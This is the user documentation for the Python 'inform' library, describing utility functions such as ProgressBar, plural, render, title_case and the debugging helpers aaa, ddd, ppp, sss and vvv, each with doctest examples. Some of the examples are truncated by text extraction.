should not be. stops is the default number of indentations to use. sep is the string used to separate the lines. >>> from inform import display, indent >>> text = 'a b'.replace(' ', '\n') >>> display(indent(text)) a b >>> display(indent(text, first=1, stops=0)) a b >>> display(indent(text, leader='. ', first=-1, stops=2)) . a . . b Info Class¶ The Info class is intended to be used as a helper class. When instantiated, it converts provided keyword arguments to attributes. Unknown attributes evaluate to None. Info can be used directly, or it can be used as a base class. >>> from inform import display, Info >>> class Orwell(Info): ... pass >>> george = Orwell(peace='war', truth='lies') >>> display(str(george)) Orwell(peace='war', truth='lies') >>> display(george.peace) war >>> display(george.happiness) None is_collection¶ is_collection() returns True if its argument is a collection. This includes objects such as lists, tuples, sets, dictionaries, etc. It does not include strings. >>> from inform import is_collection >>> is_collection('') # string False >>> is_collection([]) # list True >>> is_collection(()) # tuple True >>> is_collection({}) # dictionary True is_iterable¶ is_iterable() returns True if its argument is a collection or a string. >>> from inform import is_iterable >>> is_iterable('abc') True >>> is_iterable(['a', 'b', 'c']) True is_mapping¶ is_collection() returns True if its argument is a mapping. This includes dictionary and other dictionary-like objects. >>> from inform import is_mapping >>> is_mapping('') # string False >>> is_mapping([]) # list False >>> is_mapping(()) # tuple False >>> is_mapping({}) # dictionary True is_str¶ is_str() returns True if its argument is a string-like object. >>> from inform import is_str >>> is_str('abc') True >>> is_str(['a', 'b', 'c']) False join¶ join() combines the arguments in a manner very similar to an informant and returns the result as a string. Uses the sep, template and wrap keyword arguments to combine the arguments. >>> from inform import display, join >>> accounts = dict(checking=1100.16, savings=13948.78, brokerage=0) >>> lines = [] >>> for name in sorted(accounts): ... lines.append(join(name, accounts[name], template='{:>10s}: ${:,.2f}')) >>> display(*lines, sep='\n') brokerage: $0.00 checking: $1,100.16 savings: $13,948.78 os_error¶ os_error() generates clean messages for operating system errors. >>> from inform import error, os_error >>> try: ... with open('temperatures.csv') as f: ... contents = f.read() ... except OSError as e: ... error(os_error(e)) myprog error: temperatures.csv: no such file or directory. parse_range¶ func:parse_range can be used to parse sets of numbers from user-inputted strings. >>> from inform import parse_range >>> parse_range('1-3,5') {1, 2, 3, 5} ProgressBar Class¶ The ProgressBar class is used to draw a progress bar as a single text line. The line counts down as progress is made and reaches 0 as the task completes. Interruptions are handled with grace. There are three typical ways to use the progress bar. The first is used to illustrate the progress of an iterator. The iterator must have a length. For example: >>> from inform import ProgressBar >>> processed = [] >>> def process(item): ... # this function would implement some expensive operation ... processed.append(item) >>> items = ['i1', 'i2', 'i3', 'i4', 'i5', 'i6', 'i7', 'i8', 'i9', 'i10'] >>> for item in ProgressBar(items, prefix='Progress: ', width=60): ... process >>> display('Processed:', conjoin(processed), end='.\n') Processed: i1, i2, i3, i4, i5, i6, i7, i8, i9 and i10. The second is similar to the first, except you just give an integer to indicate how many iterations you wish: >>> for i in ProgressBar(50, prefix='Progress: '): ... process(i) Finally, the third illustrates progress through a continuous range: >>> stop = 1e-6 >>> step = 1e-9 >>> with ProgressBar(stop) as progress: ... display('Progress:') ... value = 0 ... while value <= stop: ... progress.draw(value) ... value += In this case, you need to notify the progress bar if you decide to exit the loop before its complete unless an exception is raised that causes the with block to exit: >>> with ProgressBar(stop) as progress: ... display('Progress:') ... value = 0 ... while value <= stop: ... progress.draw(value) ... value += step ... if value > stop/2: ... progress.escape() ... Without calling escape, the bar would have been terminated with a 0 upon exiting the with block. Using escape() is not necessary if the with block is exited via an exception: >>> try: ... with ProgressBar(stop) as progress: ... display('Progress:') ... value = 0 ... while value <= stop: ... progress.draw(value) ... value += step ... if value > stop/2: ... raise Error('early exit.') ... except Error as e: ... e.report() myprog error: early exit. It is possible to pass a second argument to ProgressBar.draw() that indicates the desired marker to use when updating the bar. This is usually used to signal that there was a problem with the update. To do so, you define the desired markers when instantiating ProgressBar. Each marker consists of a fill character and a color. The color can be specified by giving its name, with a Color object, or with None. For example, the following example uses markers to distinguish four types of results: okay, warn, fail, error. >>> results = 'okay okay okay fail okay fail okay error warn okay'.split() >>> def process(index): ... # this function would implement some expensive operation ... return results[index] >>> markers = dict( ... okay=('⋅', None), ... warn=('−', None), ... fail=('+', None), ... error=('×', None) ... ) >>> with ProgressBar(len(results), prefix="progress: ", markers=markers) as progress: ... for i in range(len(results)): ... status = results[i] ... progress.draw(i+1, status)++++++6⋅⋅⋅⋅⋅⋅5++++++4⋅⋅⋅⋅⋅⋅3××××××2−−−−−−1⋅⋅⋅⋅⋅⋅0 In this case color was not used, but you could specify the following to render the markers in color: >>> markers = dict( ... okay=('⋅', 'green'), ... warn=('–', 'yellow'), ... fail=('+', 'magenta'), ... error=('×', 'red') ... ) You can also use the Color class: >>> markers = dict( ... okay=('⋅', Color('green', Color.isTTY())), ... warn=('–', Color('yellow', Color.isTTY())), ... fail=('+', Color('magenta', Color.isTTY())), ... error=('×', Color('red', Color.isTTY())) ... ) The progress bar generally handles interruptions with grace. For example: >>> for item in ProgressBar(items, prefix='Progress: ', width=60): ... if item == 'i4': ... warn('bad value.', culprit myprog warning: i4: bad value. Notice that the warning started on a new line and the progress bar was restarted from the beginning after the warning. Generally the progress bar is not printed if no tasks were performed. In some cases you would like to associate a progress bar with an iterator, and then decide later whether there are any tasks that require processing. That could be handled as follows: >>> with ProgressBar(items, prefix='Progress: ') as progress: ... for i, item in enumerate(items): ... if item.startswith('i'): ... continue ... progress.draw(i) ... process(item) In this example, every item starts with ‘i’ and so is skipped. The result is that no items are processed and so the progress bar is not printed. plural¶ Used with python format strings to conditionally format a phrase depending on whether it refers to a singular or plural number of things. The format specification. Here is a typical usage: >>> from inform import plural, conjoin >>> astronauts = ['John Glenn'] >>> f"The {plural(astronauts):astronaut/s}: {conjoin(astronauts)}" 'The astronaut: John Glenn' >>> astronauts = ['Neil Armstrong', 'Buzz Aldrin', 'Michael Collins'] >>> f"The {plural(astronauts):astronaut/s}: {conjoin(astronauts)}" 'The astronauts: Neil Armstrong, Buzz Aldrin and Michael Collins' The count can be inserted into the output by placing # into the format specification. If using ‘#’ or ‘!’ is inconvenient, you can change them by specifying the num or invert to plural(). Examples: >>> f"{plural(1):# thing}" '1 thing' >>> f"{plural(2):# thing}" ' Finally, you can use the format method to directly produce a descriptive string: >>> plural(2).format("/a cactus/# cacti") '2 cacti' The original implementation is from Veedrac. render¶ render() recursively converts(). The dictionary keys and set values are sorted if sort is True. Sometimes this is not possible because the values are not comparable, in which case render reverts to the natural order. This example prints several Python data types: >>>', } >>> E={'s': s1, 'n': n, 'S': S, 'L': L, 'd':d, 'D':D} >>> display('E', '=', render(E, True)) E = { 'D': { 'L': [ 'alpha string', 42, {'alpha string', 'beta string'}, ], 'S': {'alpha string', 'beta string'}, 'd': {1: 'alpha string', 2: 'beta string'}, 'n': 42, 's': 'alpha string', }, 'L': [ 'alpha string', 42, {'alpha string', 'beta string'}, ], 'S': {'alpha string', 'beta string'}, 'd': {1: 'alpha string', 2: 'beta string'}, 'n': 42, 's': 'alpha string', } In addition, you can add support for render to your classes by adding one or both of these methods: _inform_get_args(): returns a list of argument values. _inform_get_kwargs(): returns a dictionary of keyword arguments. >>>', ) render_bar¶ render_bar() produces a graphic representation of a normalized value in the form of a bar. normalized_value is the value to render; it is expected to be a value between 0 and 1. width specifies the maximum width of the line in characters. >>> from inform import render_bar, display >>> for i in range(10): ... value = 1 - i/9.02 ... display('{:0.3f}: {}'.format(value, render_bar(value, 70))) 1.000: ██████████████████████████████████████████████████████████████████████ 0.889: ██████████████████████████████████████████████████████████████▏ 0.778: ██████████████████████████████████████████████████████▍ 0.667: ██████████████████████████████████████████████▋ 0.557: ██████████████████████████████████████▉ 0.446: ███████████████████████████████▏ 0.335: ███████████████████████▍ 0.224: ███████████████▋ 0.113: ███████▉ 0.002: ▏ title_case¶ title_case() converts the initial letters in the words of a string to upper case while maintaining any letters that are already upper case, such as acronyms. Common ‘small’ words are excepted and words within quotes are handled properly. >>> from inform import title_case >>>>> display(title_case(headline)) CDC Warns About "Aggressive" Rats as Coronavirus Shuts Down Restaurants. aaa¶ aaa() prints and then returns its argument. The argument may be name or unnamed. If named, the name is used as a label when printing the value of the argument. It can be used to print the value of a term within an expression without being forced to replicate that term. In the following example, a critical statement is instrumented to show the intermediate values in the computation. In this case it would be difficult to see these intermediate values by replicating code, as calls to the update method has the side effect of updating the state of the integrator. >>> from inform import aaa, display >>> class Integrator: ... def __init__(self, ic=0): ... self.state = ic ... def update(self, vin): ... self.state += vin ... return self.state >>> int1 = Integrator(1) >>> int2 = Integrator() >>> vin = 1 >>> vout = 0 >>> for t in range(1, 3): ... vout = 0.7*aaa(int2=int2.update(aaa(int1=int1.update(vin-vout)))) ... display('vout = {}'.format(vout)) myprog DEBUG: <doctest user.rst[...]>, 2, __main__: int1: 2 myprog DEBUG: <doctest user.rst[...]>, 2, __main__: int2: 2 vout = 1.4 myprog DEBUG: <doctest user.rst[...]>, 2, __main__: int1: 1.6 myprog DEBUG: <doctest user.rst[...]>, 2, __main__: int2: 3.6 vout = 2.52 ddd¶ ddd() pretty prints all of both its unnamed and named arguments. >>> from inform import ddd >>> a = 1 >>>>> c = (2, 3) >>> d = {'a': a, 'b': b, 'c': c} >>> ddd(a, b, c, d) myprog DEBUG: <doctest user.rst[...]>, 1, __main__: 1 'this is a test' (2, 3) { 'a': 1, 'b': 'this is a test', 'c': (2, 3), } If you give named arguments, the name is prepended to its value: >>> from inform import ddd >>> ddd(a=a, b=b, c=c, d=d, s='hey now!') myprog DEBUG: <doctest user.rst[...]>, 1, __main__: a = 1 b = 'this is a test' c = (2, 3) d = { 'a': 1, 'b': 'this is a test', 'c': (2, 3), } s = 'hey now!' If an arguments has a __dict__ attribute, it is printed rather than the argument itself. >>> from inform import ddd >>> class Info: ... def __init__(self, **kwargs): ... self.__dict__.update(kwargs) ... ddd(self=self) >>> contact = Info(email='ted@ledbelly.com', name='Ted Ledbelly') myprog DEBUG: <doctest user.rst[...]>, 4, __main__.Info.__init__(): self = Info object containing { 'email': 'ted@ledbelly.com', 'name': 'Ted Ledbelly', } ppp¶ ppp() is very similar to the normal Python print function in that it prints out the values of the unnamed arguments under the control of the named arguments. It also takes the same named arguments as print(), such as sep and end. If given without unnamed arguments, it will just print the header, which good way of confirming that a line of code has been reached. >>> from inform import ppp >>> a = 1 >>>>> c = (2, 3) >>> d = {'a': a, 'b': b, 'c': c} >>> ppp(a, b, c) myprog DEBUG: <doctest user.rst[...]>, 1, __main__: 1 this is a test (2, 3) sss¶ sss() prints a stack trace, which can answer the How did I get here? question better than a simple print function. >> from inform import sss >> def foo(): .. sss() .. print('CONTINUING') >> foo() DEBUG: <doctest user.rst[...]>:2, __main__.foo(): Traceback (most recent call last): ... CONTINUING vvv¶ vvv() prints variables from the calling scope. If no arguments are given, then all the variables are printed. You can optionally give specific variables on the argument list and only those variables are printed. >>> from inform import vvv >>> vvv(b, d) myprog DEBUG: <doctest user.rst[...]>, 1, __main__: b = 'this is a test' d = { 'a': 1, 'b': 'this is a test', 'c': (2, 3), } This last feature is not completely robust. The checking is done by value, so if several variables share the value of one requested, they are all shown. >>> from inform import vvv >>> aa = 1 >>> vvv(a) myprog DEBUG: <doctest user.rst[...]>, 1, __main__: a = 1 aa = 1 vin = 1 Site Customization¶ Many people choose to add the importing of the debugging function to their usercustomize.py file. In this way, the debugging functions are always available without the need to explicitly import them. To accomplish this, create a usercustomize.py files that contains the following and place it in your site-packages directory: # Include Inform debugging routines try: # python3 import builtins except ImportError: # python2 import __builtin__ as builtins try: from inform import aaa, ddd, ppp, sss, vvv builtins.aaa = aaa builtins.ddd = ddd builtins.ppp = ppp builtins.sss = sss builtins.vvv = vvv except ImportError: pass The path of this file is typically ~/.local/lib/pythonN.M/site-packages/usercustomize.py where M.N is the version number of your python. Inform Helper Functions¶ An informer (an Inform object) provides a number of useful methods. However, it is common that the informer is not locally available. To avoid the clutter that would be created by passing the informer around to where ever it is needed, Inform gives you several alternate ways of accessing these methods. Firstly is get_informer(), which simply returns the currently active informer. Secondly, Inform provides a collection of functions that provide direct access to the corresponding methods on the currently active informer. They are: done¶ done() terminates the program with the normal exit status. It calls Inform.done() for the active informer. If the exit argument is False, preparations are made for exiting, but sys.exit is not called. Instead, the desired exit status is returned. terminate¶ terminate() terminates the program with specified exit status or message. It calls Inform.terminate() for the active informer. status may be an integer, boolean, string, or None. An exit status of 1 is used if True or a string is passed in. If None is passed in then 1 is used for the exit status if an error was reported and 0 otherwise. If the exit argument is False, preparations are made for exiting, but sys.exit is not called. Instead, the desired exit status is returned. terminate_if_errors¶ terminate_if_errors() terminates the program with specified exit status or message if an error was previously reported. It calls Inform.terminate_if_errors() for the active informer. status may be an integer, boolean, or string. An exit status of 1 is used if True or a string is passed in. If the exit argument is False, preparations are made for exiting, but sys.exit is not called. Instead, the desired exit status is returned. errors_accrued¶ errors_accrued() returns the number of errors that have been reported. It calls Inform.errors_accrued() for the active informer. If the reset argument is True, the error count is reset to 0. get_prog_name¶ get_prog_name() returns the name of the program. It calls Inform.get_prog_name() for the active informer. get_informer¶ get_informer() returns the currently active informer. set_culprit¶ set_culprit() saves a culprit in the informer for later use. Any existing saved culprit is temporarily moved out of the way. It calls Inform.set_culprit() for the active informer. A culprit is a string, number, or tuple of strings or numbers that would be prepended to a message to indicate the object of the message. Inform.set_culprit() is used with Python’s with statement. The original saved culprit is restored when the with statement exits. See Culprits for an example of set_culprit() use. add_culprit¶ add_culprit() appends a culprit to any existing saved culprit. It calls Inform.add_culprit() for the active informer. A culprit is a string, number, or tuple of strings or numbers that would be prepended to a message to indicate the object of the message. Inform.add_culprit() is used with Python’s with statement. The original saved culprit is restored when the with statement exits. See Culprits for an example of add_culprit() use. get_culprit¶ get_culprit() returns the specified culprit, if any, appended to the end of the current culprit that is saved in the informer. The resulting culprit is always returned as a tuple. It calls Inform.get_culprit() for the active informer. A culprit is a string, number, or tuple of strings or numbers that would be prepended to a message to indicate the object of the message. See Culprits for an example of get_culprit() use.
https://inform.readthedocs.io/en/stable/user.html
CC-MAIN-2022-40
refinedweb
7,322
59.5
Symbolic Expressions and Constraint Solving angr's power comes not from it being an emulator, but from being able to execute with what we call symbolic variables. Instead of saying that a variable has a concrete numerical value, we can say that it holds a symbol, effectively just a name. Then, performing arithmetic operations with that variable will yield a tree of operations (termed an abstract syntax tree or AST, from compiler theory). ASTs can be translated into constraints for an SMT solver, like z3, in order to ask questions like "given the output of this sequence of operations, what must the input have been?" Here, you'll learn how to use angr to answer this. Working with Bitvectors Let's get a dummy project and state so we can start playing with numbers. import angr, monkeyhex proj = angr.Project('/bin/true') state = proj.factory.entry_state() A bitvector is just a sequence of bits, interpreted with the semantics of a bounded integer for arithmetic. Let's make a few. # 64-bit bitvectors with concrete values 1 and 100 one = state.solver.BVV(1, 64) one <BV64 0x1> one_hundred = state.solver.BVV(100, 64) one_hundred <BV64 0x64> # create a 27-bit bitvector with concrete value 9 weird_nine = state.solver.BVV(9, 27) weird_nine <BV27 0x9> As you can see, you can have any sequence of bits and call them a bitvector. You can do math with them too: 0x65> # You can provide normal python integers and they will be coerced to the appropriate type: one_hundred + 0x100 <BV64 0x164> # The semantics of normal wrapping arithmetic apply one_hundred - one*200 <BV64 0xffffffffffffff9c>one + one_hundred <BV64 You cannot say one + weird_nine, though. It is a type error to perform an operation on bitvectors of differing lengths. You can, however, extend weird_nine so it has an appropriate number of bits: 64 - 27) <BV64 0x9> one + weird_nine.zero_extend(64 - 27) <BV64 0xa>weird_nine.zero_extend( zero_extend will pad the bitvector on the left with the given number of zero bits. You can also use sign_extend to pad with a duplicate of the highest bit, preserving the value of the bitvector under two's compliment signed integer semantics. Now, let's introduce some symbols into the mix. # Create a bitvector symbol named "x" of length 64 bits x = state.solver.BVS("x", 64) x <BV64 x_9_64> y = state.solver.BVS("y", 64) y <BV64 y_10_64> x and y are now symbolic variables, which are kind of like the variables you learned to work with in 7th grade algebra. Notice that the name you provided has been been mangled by appending an incrementing counter and You can do as much arithmetic as you want with them, but you won't get a number back, you'll get an AST instead. 0x1> (x + one) / 2 <BV64 (x_9_64 + 0x1) / 0x2> x - y <BV64 x_9_64 - y_10_64>x + one <BV64 x_9_64 + Technically x and y and even one are also ASTs - any bitvector is a tree of operations, even if that tree is only one layer deep. To understand this, let's learn how to process ASTs. Each AST has a .op and a .args. The op is a string naming the operation being performed, and the args are the values the operation takes as input. Unless the op is BVV or BVS (or a few others...), the args are all other ASTs, the tree eventually terminating with BVVs or BVSs. 1) / (y + 2) tree <BV64 (x_9_64 + 0x1) / (y_10_64 + 0x2)> tree.op '__div__' tree.args (<BV64 x_9_64 + 0x1>, <BV64 y_10_64 + 0x2>) tree.args[0].op '__add__' tree.args[0].args (<BV64 x_9_64>, <BV64 0x1>) tree.args[0].args[1].op 'BVV' tree.args[0].args[1].args (1, 64)tree = (x + From here on out, we will use the word "bitvector" to refer to any AST whose topmost operation produces a bitvector. There can be other data types represented through ASTs, including floating point numbers and, as we're about to see, booleans. Symbolic Constraints Performing comparison operations between any two similarly-typed ASTs will yield another AST - not a bitvector, but now a symbolic boolean. 1 <Bool x_9_64 == 0x1> x == one <Bool x_9_64 == 0x1> x > 2 <Bool x_9_64 > 0x2> x + y == one_hundred + 5 <Bool (x_9_64 + y_10_64) == 0x69> one_hundred > 5 <Bool True> one_hundred > -5 <Bool False>x == One tidbit you can see from this is that the comparisons are unsigned by default. The -5 in the last example is coerced to <BV64 0xfffffffffffffffb>, which is definitely not less than one hundred. If you want the comparison to be signed, you can say one_hundred.SGT(-5) (that's "signed greater-than"). A full list of operations can be found at the end of this chapter. This snippet also illustrates an important point about working with angr - you should never directly use a comparison between variables in the condition for an if- or while-statement, since the answer might not have a concrete truth value. Even if there is a concrete truth value, if one > one_hundred will raise an exception. Instead, you should use solver.is_true and solver.is_false, which test for concrete truthyness/falsiness without performing a constraint solve. 1 no = one == 2 maybe = x == y state.solver.is_true(yes) True state.solver.is_false(yes) False state.solver.is_true(no) False state.solver.is_false(no) True state.solver.is_true(maybe) False state.solver.is_false(maybe) Falseyes = one == Constraint Solving You can use treat any symbolic boolean as an assertion about the valid values of a symbolic variable by adding it as a constraint to the state. You can then query for a valid value of a symbolic variable by asking for an evaluation of a symbolic expression. An example will probably be more clear than an explanation here: 2) state.solver.add(10 > x) state.solver.eval(x) 4state.solver.add(x > y) state.solver.add(y > By adding these constraints to the state, we've forced the constraint solver to consider them as assertions that must be satisfied about any values it returns. If you run this code, you might get a different value for x, but that value will definitely be greater than 3 (since y must be greater than 2 and x must be greater than y) and less than 10. Furthermore, if you then say state.solver.eval(y), you'll get a value of y which is consistent with the value of x that you got. If you don't add any constraints between two queries, the results will be consistent with each other. From here, it's easy to see how to do the task we proposed at the beginning of the chapter - finding the input that produced a given output. # get a fresh state without constraints state = proj.factory.entry_state() input = state.solver.BVS('input', 64) operation = (((input + 4) * 3) >> 1) + input output = 200 state.solver.add(operation == output) state.solver.eval(input) 0x3333333333333381 Note that, again, this solution only works because of the bitvector semantics. If we were operating over the domain of integers, there would be no solutions! If we add conflicting or contradictory constraints, such that there are no values that can be assigned to the variables such that the constraints are satisfied, the state becomes unsatisfiable, or unsat, and queries against it will raise an exception. You can check the satisfiability of a state with state.satisfiable(). 2**32) state.satisfiable() Falsestate.solver.add(input < You can also evaluate more complex expressions, not just single variables. # fresh state state = proj.factory.entry_state() state.solver.add(x - y >= 4) state.solver.add(y > 0) state.solver.eval(x) 5 state.solver.eval(y) 1 state.solver.eval(x + y) 6 From this we can see that eval is a general purpose method to convert any bitvector into a python primitive while respecting the integrity of the state. This is why we use eval to convert from concrete bitvectors to python ints, too! Also note that the x and y variables can be used in this new state despite having been created using an old state. Variables are not tied to any one state, and can exist freely. Floating point numbers z3 has support for the theory of IEEE754 floating point numbers, and so angr can use them as well. The main difference is that instead of a width, a floating point number has a sort. You can create floating point symbols and values with FPV and FPS. # fresh state state = proj.factory.entry_state() a = state.solver.FPV(3.2, state.solver.fp.FSORT_DOUBLE) a <FP64 FPV(3.2, DOUBLE)> b = state.solver.FPS('b', state.solver.fp.FSORT_DOUBLE) b <FP64 FPS('FP_b_0_64', DOUBLE)> a + b <FP64 fpAdd('RNE', FPV(3.2, DOUBLE), FPS('FP_b_0_64', DOUBLE))> a + 4.4 <FP64 FPV(7.6000000000000005, DOUBLE)> b + 2 < 0 <Bool fpLT(fpAdd('RNE', FPS('FP_b_0_64', DOUBLE), FPV(2.0, DOUBLE)), FPV(0.0, DOUBLE))> So there's a bit to unpack here - for starters the pretty-printing isn't as smart about floating point numbers. But past that, most operations actually have a third parameter, implicitly added when you use the binary operators - the rounding mode. The IEEE754 spec supports multiple rounding modes (round-to-nearest, round-to-zero, round-to-positive, etc), so z3 has to support them. If you want to specify the rounding mode for an operation, use the fp operation explicitly ( solver.fpAdd for example) with a rounding mode (one of solver.fp.RM_*) as the first argument. Constraints and solving work in the same way, but with eval returning a floating point number: 2 < 0) state.solver.add(b + 2 > -1) state.solver.eval(b) -2.4999999999999996state.solver.add(b + This is nice, but sometimes we need to be able to work directly with the representation of the float as a bitvector. You can interpret bitvectors as floats and vice versa, with the methods raw_to_bv and raw_to_fp: 0x400999999999999a> b.raw_to_bv() <BV64 fpToIEEEBV(FPS('FP_b_0_64', DOUBLE))> state.solver.BVV(0, 64).raw_to_fp() <FP64 FPV(0.0, DOUBLE)> state.solver.BVS('x', 64).raw_to_fp() <FP64 fpToFP(x_1_64, DOUBLE)>a.raw_to_bv() <BV64 These conversions preserve the bit-pattern, as if you casted a float pointer to an int pointer or vice versa. However, if you want to preserve the value as closely as possible, as if you casted a float to an int (or vice versa), you can use a different set of methods, val_to_fp and val_to_bv. These methods must take the size or sort of the target value as a parameter, due to the floating-point nature of floats. 3.2, DOUBLE)> a.val_to_bv(12) <BV12 0x3> a.val_to_bv(12).val_to_fp(state.solver.fp.FSORT_FLOAT) <FP32 FPV(3.0, FLOAT)>a <FP64 FPV( These methods can also take a signed parameter, designating the signedness of the source or target bitvector. More Solving Methods eval will give you one possible solution to an expression, but what if you want several? What if you want to ensure that the solution is unique? The solver provides you with several methods for common solving patterns:can be passed as a tuple of constraints. These constraints will be taken into account for this evaluation, but will not be added to the state. cast_tocan". Summary That was a lot!! After reading this, you should be able to create and manipulate bitvectors, booleans, and floating point values to form trees of operations, and then query the constraint solver attached to a state for possible solutions under a set of constraints. Hopefully by this point you understand the power of using ASTs to represent computations, and the power of a constraint solver. In the appendix, you can find a reference for all the additional operations you can apply to ASTs, in case you ever need a quick table to look at.
https://docs.angr.io/docs/solver.html
CC-MAIN-2017-51
refinedweb
1,959
66.03
Generates a class for reference to a non-existent class and adds the class members referenced from the initial code to it. The class is declared in a new source code file. This Code Provider is especially useful for Test-Driven Development. It allows you to first write a code fragment and then easily create declarations for classes referenced in it. The Declare Class Code Provider also declares class members called from the initial code. Available on a class name if the class does not exist. Place the caret on a non-existent class name in its construction. The blinking cursor shows the caret's position at which the Code Provider is available. After execution, the Code Provider adds a new file to the project and declares the class in it. //Filename: Customer.cs public class Customer { public Customer(string param1, string param2) { } public void SaveToDB() { throw new NotImplementedException(); } public int Age { get; set; } } You can configure where to place the newly-generated type declarations. The possible options are: Above the current type, Below the current type, or Create a new file. Open the Editor | <Language> | Code Actions | Code Actions Settings options page to change this option.
https://docs.devexpress.com/CodeRushForRoslyn/115689/coding-assistance/code-providers/declaration-providers/declare-class
CC-MAIN-2018-51
refinedweb
197
63.9
of XPath identifiers and XSL tag elements. For a transformation of one XML document to another, you might use an XSLT template element, which uses an existing XSLT file to define how the resulting XML should look. Why is XSLT Useful? The usefulness of XSLT can best be shown by example. So lets say we have the XML document below: <?xml version="1.0" encoding="ISO-8859-1"?> <collection> <car> <make>Lamborghini</make> <model>Gallardo</model> <year>2013</year> <price>$250,000</price> </car> <car> <make>Ferrari</make> <model>F12</model> <year>2012</year> <price>$330,000</price> </car> <car> <make>Honda</make> <model>Civic</model> <year>2004</year> <price>$2,500</price> </car> </collection> Maybe we'd rather display parts of this XML in a nice, human readable format, like HTML. So we'd then create a template, like this: <?xml version="1.0" encoding="ISO-8859-1"?> <xsl:stylesheet <xsl:template <html> <body> <h5>My Car Collection</h5> <table border="1"> <tr bgcolor="#EC5923"> <th>Make</th> <th>Model</th> </tr> <tr> <td><xsl:value-of</td> <td><xsl:value-of</td> </tr> </table> </body> </html> </xsl:template> </xsl:stylesheet> Using this template on the XML we had above would result in the following HTML: My Car Collection This, obviously, is much easier to read. Although, XSLT doesn't strickly need to be used to transform XML in to HTML. Instead you could use it to just transform XML in to a different structure. For another example, maybe you work for a company that receives XML data from it's suppliers that details how much inventory they have available for their products, A through Z. But you only care about products S, R, and W, so instead of storing all of that unnecessary information you would instead use an XSLT template to extract out only the information you care about, which in this case is products S, R, and W. Applying this method in a larger scale would result in a lot of saved memory and much less clutter to deal with. Plus, changing the document format would arguably be much easier than having to recompile code that does the same thing. Keep in mind that this short example only shows a small amount of what XSLT can actually do. To get a better idea of what's possible, be sure to check out the resources below. How do you use XSLT? There are many ways of using XSLT, including browsers, Java, Python, and pretty much any other programming language you can think of. As with everything, XSLT transforms can easily be done in Python (with the lxml package): import lxml.etree as et xml = et.parse(xml_filename) xslt = et.parse(xsl_filename) transform = et.XSLT(xslt) newXml = transform(xml) print(et.tostring(newXml, pretty_print=True)) And as I mentioned before, XSLT can easily transform XML to JSON.
http://stackabuse.com/xslt-explained/
CC-MAIN-2018-26
refinedweb
479
62.78
While using Unity 2018.1 with the latest PlayFab SDK, I noticed that PlayFabHttp.Update() is executing every frame, generating 488 bytes of garbage. This cannot be intended behavior, can it? As far as I know, there's nothing in my code that should trigger such update frequency. Is this a known issue? I don't believe I've seen such behavior before in earlier SDKs. screenshot.png Answer by Andy · Sep 05, 2018 at 08:40 PM Digging in, it appears to be intentional, though I don't think the impact was well-considered. It's from the Plugin Manager that we started roughing in at the beginning of August (). I'm filing a bug on our SDK team to investigate a better way of introducing this infrastructure and, at least, providing a toggle for the functionality. Thanks, @Andy! In the meantime, would the world end if I were to comment out the offending code? private void Update() { /* var transport = PluginManager.GetPlugin<ITransportPlugin>(PluginContract.PlayFab_Transport); if (transport.IsInitialized) { if (_apiCallQueue != null) { foreach (var eachRequest in _apiCallQueue) transport.MakeApiCall(eachRequest); // Flush the queue _apiCallQueue = null; // null this after it's flushed } transport.Update(); } #if ENABLE_PLAYFABPLAYSTREAM_API && ENABLE_PLAYFABSERVER_API if (_internalSignalR != null) { _internalSignalR.Update(); } #endif */ } While the world wouldn't end, commenting that entire function out would mean the PlayFab SDK would stop working. Instead, it should be changed such that we only call GetPlugin<ITransportPlugin>() once and then reuse the result for subsequent calls. I or someone on the SDK team will probably be putting together a pull request to correct this soon, though you're welcome to give it a shot. :) Answer by robert · Dec 28, 2018 at 07:24 AM Any progress on this one? A GC Alloc (from PluginManager.GetPlugin) for each frame has quite a performance impact. We workaround this locally by caching transport from PluginManager.GetPlugin() in PlayFabHttp.Update() for now private void Update() { if (transportPlugin == null) transportPlugin = PluginManager.GetPlugin<ITransportPlugin>(PluginContract.PlayFab_Transport); if (transportPlugin.IsInitialized) { .... Answers Answers and Comments 2 People are following this question.
https://community.playfab.com/questions/22881/playfabhttpupdate-being-called-every-frame.html
CC-MAIN-2019-22
refinedweb
339
51.95
I got my hands dirty with SAX2 and, man, I love their namespace support, it's great, clean, perfect, just fits perfectly with what I need. Then I look at XSLT and, hmmm, their level of namespace support isn't quite what I like... ok, let's make an example: <my:page xmlns: ... </my:page> How would a "normal" person access this in XSLT? simple <xsl:template </xsl:template> All right (I know you already smell the problem, but keep going) then I move my page to <my-stuff:page xmlns: ... <my-stuff:page> because I found that that the "my" prefix is used in another (and more famous) schema. Great, while good behaving SAX2 applications don't give a damn since the "page" element is correctly interpreted (in memory) as^page no matter what prefix is used (as the namespace spec rules), in XSLT... well, I honestly don't know. Please help, the XPath spec is not very clear! ------------------------- ---------------------
http://mail-archives.apache.org/mod_mbox/cocoon-dev/200008.mbox/%3C39A56A0D.6444D43@apache.org%3E
CC-MAIN-2017-26
refinedweb
160
80.41
Sometime things don’t always go as planned. I was making some nice progress with the process of mapping a database and all of a sudden I get the following compile time error message. - Ambiguous type reference. A type named “Attribute” occurs in at least two namespaces. - “Attribute” ist ein mehrdeutiger Verweis und kann “System.Attribute” oder “NAMESPACE.Attribute” sein. There was a database table named Attribute and I simply created the Attribute.cs file and class and then referenced the Attribute via a many-to-one mapping and the error was generated. The error was rightly generated because the compiler was not able to determine which Attribute class I was referring to. I wrote about an issue I had using reserved words as variables within code here. It causes some problems later and doing it should be avoided. But of course, you need to know it’s a reserved word before you know not to use it, that comes with time. To resolve the error I provided the NAMESPACE.Attribute from the reference within the class.cs file. Then the compiler know I didn’t want System.Attribute and instead wanted the custom Attribute class created within my program.
https://www.thebestcsharpprogrammerintheworld.com/2012/05/23/nhibernate-mapping-experience-with-an-ambiguous-reference/
CC-MAIN-2021-39
refinedweb
200
67.96
